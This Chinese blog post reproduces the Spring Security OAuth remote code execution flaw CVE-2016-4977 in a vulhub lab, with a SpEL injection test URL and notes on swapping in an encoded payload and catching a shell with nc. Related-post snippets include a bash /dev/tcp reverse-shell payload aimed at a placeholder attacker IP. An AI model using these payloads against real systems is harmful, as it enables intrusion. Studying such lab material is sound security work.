vulhub中spring的CVE-2016-4977漏洞复现

已于 2024-02-02 14:37:03 修改
阅读量535 收藏 6
点赞数 12
分类专栏: vulhub漏洞复现 文章标签: spring java 数据库
于 2023-11-29 19:24:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yougexiaojiuguan/article/details/134696817
版权

影响版本

Spring Security OAuth 1.0.0到1.0.5
Spring Security OAuth 2.0.0到2.0.9
Spring Security OAuth 2.0到2.0.14
Spring Security OAuth 2.1到2.1.1
Spring Security OAuth 2.2到2.2.1
Spring Security OAuth 2.3到2.3.2

漏洞原理

是该版本的Spring的一个错误页面,存在参数获取未进行过滤,导致可以直接对服务器执行系统权限

具体过程

首先打开靶场环境后可以看到

在url后面拼接

/oauth/authorize?response_type=${233*233}&client_id=acme&scope=openid&redirect_uri=http://test

之后就可以看到233*233被执行。

进一步复现只需要将233*233用payload替换掉就可以了

然后用vulhub环境下的poc对payload进行编码就可以

准备好nc就可以连接到机器

参考博客文章

漏洞复现-CVE-2016-4977-Spring远程代码执行 - 铺哩 - 博客园 (cnblogs.com)

SpringSecurityOauth RCE (CVE-2016-4977) 分析与复现 - ka1n4t - 博客园 (cnblogs.com)

余生有个小酒馆
关注
  • 12
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[ vulhub漏洞复现篇 ] Jetty Utility Servlets ConcatServlet 双重解码信息泄露漏洞CVE-2021-28169
qq_51577576的博客
09-12 1681
[ vulhub漏洞复现篇 ] Jetty Utility Servlets ConcatServlet 双重解码信息泄露漏洞CVE-2021-28169
ActiveMQ 任意文件写入漏洞 (CVE-2016-3088)复现实验报告
weixin_48400575的博客
01-23 3091
ActiveMQ 任意文件写入漏洞 (CVE-2016-3088)复现实验报告
vulhubSpring Security OAuth2 RCE(CVE-2016-4977
weixin_42884199的博客
12-04 881
一、启动靶机 docker-compose up -d url: http://192.168.150.143:8080/oauth/authorize admin、admin url: http://192.168.150.143:8080/oauth/authorize?response_type=${223*223}&client_id=acme&scope=openid&redirect_uri= 二、生成payload curl http://xx.xx.xx.
vulhubSpring boot Security OAuth RCE (CVE-2016-4977) 漏洞验证与getshell复现
qq_45300786的博客
07-30 2232
利用条件 0x01 影响版本 Spring Security OAuth 1.0.0到1.0.5 Spring Security OAuth 2.0.0到2.0.9 Spring Security OAuth 2.0到2.0.14 Spring Security OAuth 2.1到2.1.1 Spring Security OAuth 2.2到2.2.1 Spring Security OAuth 2.3到2.3.2 0x02 默认登录账号密码 admin\admin 访问路径/oauth/auth
vulhubGIT-SHELL 沙盒绕过漏洞复现CVE-2017-8386)
最新发布
yougexiaojiuguan的博客
03-17 973
漏洞复现过程的记录
CVE-2016-4977(Spring-Security-Oauth)RCE远程命令执行漏洞复现(超详细版!)
精品博客,你值得一看~
09-02 1194
它是为了解决企业应用开发的复杂性而创建的。Spring Security OAuth2处理认证请求的时候如果使用了whitelabel视图,response_type参数值会被当做Spring SpEL来执行,恶意攻击者通过构造response_type值可以触发远程代码执行漏洞。#按 " i "进行编辑 ,然后复制下面的脚本 , 再按 " Esc "键 ,再按冒号wq " :wq " 保存并退出.先cd到spring目录下的CVE-2016-4977里面,然后使用docker-compose启动环境.
spring常见漏洞(1)
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
01-14 554
Spring Security OAuth RCE(cve-2016-4977),是为Spring框架提供安全认证支持的一个模块,在7月5日其维护者发布了这样一个升级公告,主要说明在用户使用来处理错误时,攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。漏洞的发现者在10月13日公开了该漏洞的挖掘记录。
vulhub-Struts2-045(CVE-2017-5638)漏洞复现
qaq517384的博客
09-06 226
vulhub msf
利用Vulnhub复现漏洞 - HTTPoxy漏洞CVE-2016-5385)
JiangBuLiu的博客
07-09 2328
HTTPoxy漏洞CVE-2016-5385)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现端口设置浏览器设置BurpSuit设置发出请求 Vulnhub官方复现教程 https://vulhub.org/#/environments/cgi/httpoxy/ 漏洞原理 参考:http://www.laruence.com/2016/07/19/3101.html 简单来说,根据RF...
漏洞复现Spring CVE-2016-4977/CVE-2017-4971/CVE-2017-8046/CVE-2018-1270/CVE-2018-1273
weixin_45556536的博客
12-24 1314
CVE-2017-4971 // 注意反弹的端口和IP修改,反弹语句需要url编码 &_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/攻击机IP/端口号+0>%261")).start()=vulhub
Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437) 复现
yukinorong的博客
06-29 3245
基础知识 序列化和反序列化 反序列化漏洞原因 在Java反序列化,会调用被反序列化的readObject方法,当readObject方法书写不当时就会引发漏洞。 反序列化的检测 基础库隐藏的反序列化漏洞 优秀的Java开发人员一般会按照安全编程规范进行编程,很大程度上减少了反序列化漏洞的产生。并且一些成熟的Java框架比如Spring MVC、Struts2等,都有相应的防范反序列化的机制。如果仅仅是开发失误,可能很少会产生反序列化漏洞,即使产生,其绕过方法、利用方式也较为复杂。但
利用Vulnhub复现漏洞 - Jackson-databind 反序列化漏洞CVE-2017-7525)
JiangBuLiu的博客
07-10 8313
Jackson-databind 反序列化漏洞CVE-2017-7525)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现端口设置浏览器设置BurpSuit设置CVE-2017-7525CVE-2017-17485 Vulnhub官方复现教程 https://vulhub.org/#/environments/jackson/CVE-2017-7525/ 漏洞原理 Jackson-da...
Apache ActiveMQ 远程代码执行漏洞CVE-2016-3088)复现及排查
dayouzi的博客
08-14 2370
ActiveMQ的web控制台分三个应用,admin、api和fileserver,其admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。所以,ActiveMQ在5.12.x~5.13.x版本,已经默认关闭了fileserver这个应用(你可以在conf/jetty.xml开启之);在5.14.0版本以后,彻底删除了fileserver应用。
【网络安全】Spring框架漏洞总结(二)
kali_Ma的博客
09-11 1075
安全防护 1.使用1.0.x版本的用户应放弃在认证通过和错误这两个页面使用Whitelabel这个视图。 2.使用2.0.x版本的用户升级到2.0.10以及更高的版本 因为对java不是很熟,所以没有对底层原理进行分析 2.Spring Web Flow框架远程代码执行(CVE-2017-4971) 漏洞简介 Spring Web Flow是Spring的一个子项目,主要目的是解决跨越多个请求的、用户与服务器之间的、有状态交互问题,提供了描述业务流程的抽象能力。 Spring WebFlow 是一个适用于
CVE-2016-4977 RCE in Spring Security OAuth漏洞分析
c0c0cf的专栏
09-21 1966
新浪微博: http://weibo.com/u/2275304001/home?wvr=5 微信公众号 DebugPwn 漏洞描述: When processing authorization requests using the whitelabel views, the response_type parameter value was executed
CVE-2016-4977 Spring远程代码执行漏洞复现 POC、EXP在文末
weixin_45715461的博客
08-10 1480
CVE-2016-4977 Spring远程代码执行漏洞复现 POC、EXP在文末
Vulhub - Imagetragick 命令执行漏洞CVE-2016–3714)
多崎巡礼的博客
12-20 1366
金盾第一天居然是复现漏洞唉。。。 安装docker等等 1.安装docker wget https://apt.dockerproject.org/repo/pool/main/d/docker-engine/docker-engine_17.05.0~ce-0~debian-jessie_amd64.deb dpkg -i docker-engine_17.05.0~ce-0~debian-j...
Spring Security OAuth2 远程命令执行漏洞CVE-2016-4977
qq_54713392的博客
05-08 777
Spring Security OAuth2 远程命令执行漏洞CVE-2016-4977漏洞原理: Spring Security OAuth2处理认证请求的时候如果使用了whitelabel视图,response_type参数值会被当做Spring SpEL来执行,恶意攻击者通过构造response_type值可以触发远程代码执行漏洞 攻击机:window10 IP:192.168.32.1 靶机:ubantu16.04 IP:192.168.32.142 (1)在vulhub靶场...
spring web的CVE-2016-1000027漏洞修复
01-10
根据提供的引用内容,CVE-2016-1000027是Spring-Web项目的一个安全漏洞。该漏洞在5.x版本存在,并且在最新版本5.3.27仍然存在。官方尚未提供解决方案。然而,在Spring-Web 6.0之后的版本,该漏洞已被修复,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值